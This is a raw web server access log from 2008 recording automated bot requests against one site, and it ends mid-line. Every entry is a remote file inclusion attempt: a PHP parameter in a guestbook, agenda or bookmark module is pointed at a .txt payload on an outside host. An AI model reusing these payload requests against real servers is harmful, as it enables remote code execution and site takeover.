69.61.37.111 - - [23/Mar/2008:19:49:03 -0700] "GET /logs/access_070903.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.61.37.111 - - [23/Mar/2008:19:49:03 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.61.37.111 - - [23/Mar/2008:19:49:11 -0700] "GET /logs/access_080113.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.70.163 - - [23/Mar/2008:19:49:41 -0700] "GET /logs/access_071217.log//mvcw_conver.php?step=http://www.liautism.com/media/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
160.99.12.231 - - [23/Mar/2008:19:49:53 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
160.99.12.231 - - [23/Mar/2008:19:49:53 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
210.109.103.220 - - [23/Mar/2008:19:50:50 -0700] "GET /logs/access_071203.log//modules/agendax/configure.php?agendax_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.109.103.220 - - [23/Mar/2008:19:50:50 -0700] "GET //modules/agendax/configure.php?agendax_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.109.103.220 - - [23/Mar/2008:19:50:51 -0700] "GET /logs//modules/agendax/configure.php?agendax_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.109.103.220 - - [23/Mar/2008:19:50:51 -0700] "GET /logs/access_080114.log//modules/agendax/configure.php?agendax_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
222.122.47.228 - - [23/Mar/2008:19:52:06 -0700] "GET /logs//modules/agendax/config.inc.php?agendax_path=http://www.codeduc.cl/modules/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
222.122.47.228 - - [23/Mar/2008:19:52:06 -0700] "GET //modules/agendax/config.inc.php?agendax_path=http://www.codeduc.cl/modules/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.61.37.111 - - [23/Mar/2008:19:52:18 -0700] "GET /logs/access_070903.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.61.37.111 - - [23/Mar/2008:19:52:18 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.61.37.111 - - [23/Mar/2008:19:52:18 -0700] "GET /logs/access_071224.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
222.122.47.228 - - [23/Mar/2008:19:52:24 -0700] "GET /logs//modules/agendax/configure.php?agendax_path=http://www.codeduc.cl/modules/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.151.245.1 - - [23/Mar/2008:19:52:46 -0700] "GET /logs/access_080225.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.151.245.1 - - [23/Mar/2008:19:52:46 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.151.245.1 - - [23/Mar/2008:19:52:47 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.151.245.1 - - [23/Mar/2008:19:52:47 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.7.207.104 - - [23/Mar/2008:19:53:10 -0700] "GET /logs/access_070903.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.7.207.104 - - [23/Mar/2008:19:53:10 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.7.207.104 - - [23/Mar/2008:19:53:12 -0700] "GET /logs/access_071224.log//modules/postguest